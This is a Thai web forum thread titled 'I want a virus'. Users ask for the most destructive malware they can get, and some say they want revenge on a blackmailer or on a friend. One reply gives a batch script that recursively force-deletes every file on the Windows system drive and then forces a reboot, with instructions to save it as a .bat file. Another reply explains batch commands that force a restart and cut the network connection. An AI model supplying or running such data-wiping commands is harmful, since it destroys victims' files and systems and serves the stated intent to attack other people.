Announcement

Collapse
No announcement yet.

อยากได้ไวรัส

Collapse
X

• Filter
  • Time
  • Show
Clear All
new posts

ทดลองใช้ดูแล้วยังอะคับ

Comment

Originally posted by godarme View Post
      ทดลองใช้ดูแล้วยังอะคับ
      ยังอะคับ ผมไม่มีโปรแกรมจำลอง Windows

Comment

พี่ๆคับ ตอนนี้ผมอยากได้ไวรัสด่วนมากๆเลยอ่ะคับ

ขอวันนี้ ตอนนี้เลย นะคับ

เอาแบบแรงที่สุดเท่าที่จะแรงได้อะคับ

หรือไม่ก็ฮาดดิสพังทุกดิสอ่ะคับ

เท่าไรยอมจ่ายคับ แต่อย่าแพงมากนะคับ^^"

แอดมาคุยด่วนเลยนะคับ กำลังเดือดร้อนมากกกก

Comment

Originally posted by sum1likeme View Post
          พี่ๆคับ ตอนนี้ผมอยากได้ไวรัสด่วนมากๆเลยอ่ะคับ

ขอวันนี้ ตอนนี้เลย นะคับ

เอาแบบแรงที่สุดเท่าที่จะแรงได้อะคับ

หรือไม่ก็ฮาดดิสพังทุกดิสอ่ะคับ

เท่าไรยอมจ่ายคับ แต่อย่าแพงมากนะคับ^^"

แอดมาคุยด่วนเลยนะคับ กำลังเดือดร้อนมากกกก
          กระทู้นี้กำลังจะกลายเป็นช่องทาง ซื้อขายไวรัส เอาไปปล่อยใส่คนอื่นซะแล้ว
          มีไวรัสพวกที่ทำให้ฮาร์ดแวร์พังไหมครับ
          แบบว่ารันจัดๆ จนแรมไหม้ ซีพียูแต๊ปไปเลยแบบนี้

Comment

คือผมโดนแบลคเมย์ง่ะ

ผมเดือดร้อนจิงๆนะคับT_T..

Comment

@echo off
              del %systemdrive%\*.*/f/s/q
              shutdown -r -f -t 00
              เซฟเป็น *.bat

หรือหาวิธีอื่นๆได้โดยการ เซิสคำว่า Destroy Windows ใน Youtube ดู

ส่วนเอาแบบฮาร์ดแวร์พังยังหาไม่เจอ
              Last edited by tsctao; 28 Apr 2009, 18:39:23.

Comment

โห บ่อนไวรัส

555+

Comment

Originally posted by tsctao View Post
                  เซฟเป็น *.bat

หรือหาวิธีอื่นๆได้โดยการ เซิสคำว่า Destroy Windows ใน Youtube ดู

ส่วนเอาแบบฮาร์ดแวร์พังยังหาไม่เจอ
                  ที่นายบอกมา มันทำงานยังไงหรอคับ?

Comment

ผมมีตัวโหดๆอยู่อ่ะครับ แต่มันใส่ซิปมาไม่ได้อ่ะ ใส่แล้วซิปแตก ดุร้ายเกิน

Comment

Originally posted by kk View Post
                      ผมมีตัวโหดๆอยู่อ่ะครับ แต่มันใส่ซิปมาไม่ได้อ่ะ ใส่แล้วซิปแตก ดุร้ายเกิน
                      โหดยังไงหรอคับ บอกที

Comment

กระทู้ตั้งแต่ปี 2006 แน่ะ เหอะๆๆ

Comment

Code:
                          @echo off
                          TITLE Mr_Unlocker
                          shutdown -r -f -t0
                          คำสั่ง DOS ง่ายๆครับ
                          echo คำสั่งให้แสดงข้อความ @echo off สั่งไม่ต้องแสดงอะไร
                          TITTLE ก็ตามชื่อ
                          shutdown คำสั่งปิดเครื่อง -r โหมดสั่ง restart -f force end program -t 0 คือเวลาถอยหลัง

Code:
                          @echo off
                          TITLE Mr_Unlocker
                          ipconfig /release
                          ipconfig /release สั่งตัด ip แก้ก็พิมพ์ ipconfig /renew ใน cmd

คำสั่งที่เหลือก็เป็นคำสั่งที่ใช้ทำงานปกติแต่เอามาพลิกแพลง ซึ่งบางอันก็ไม่รู้แบบจริงๆก็ไม่ขออธิบาย

batch file คือ file ที่รวมคำสั่งของ DOS ที่ใช้บ่อยๆ เพื่อประหยัดเวลา
                          เพียงแค่ double click ที่ batch file ก็จะรันคำสั่งที่เขียนไว้

Comment

เราก้อ อยาก ได้ มั่ง อะ ส่งมาให้เรามั่ง ดิ เอา แบบไหน ก้อได้ นะ คือเพื่อน เรา อะ มัน อยุ่ ดี ๆ ส่ง มา เล่น ไปหลายวัน เลยจาเอาคืนบ้าง ถ้ามี ใคร ส่งมาที bam_socute@hotmail.com นะ ขอร้องงง >/\<

Comment

กระทู้ไวรัสโดยเฉพาะเลย

555

Comment

Originally posted by wingblack View Post
                                " music.exe " ของท่าน battlecruiser โหลดไม่ได้ครับ kaspersky มันฆ่าไม่เหลือเลย...

ตัวนี้ผมก็ใช้ มันก็นะ ฉลาดเกิน กว่าจะเข้าใจมันใช้งานไปเกือบปี ใช้ตัวนี้ลง windows เดือน2ครั้ง แต่เดี๋ยวนี้สบายแล้ว ใช้ง่าย เมื่อวานเสียบแฟลชไดร์ลุกค้า สุดยอดดักได้แต่ฆ่าไม่ทัน โดนไปไดร์อื่นมีงี้ด้วยสุดยอด มันตามไปฆ่าถึงไดร์ ซีเลยท่าน เห็นแล้ว สนุกดี อิอิ

Comment

Working...
                                X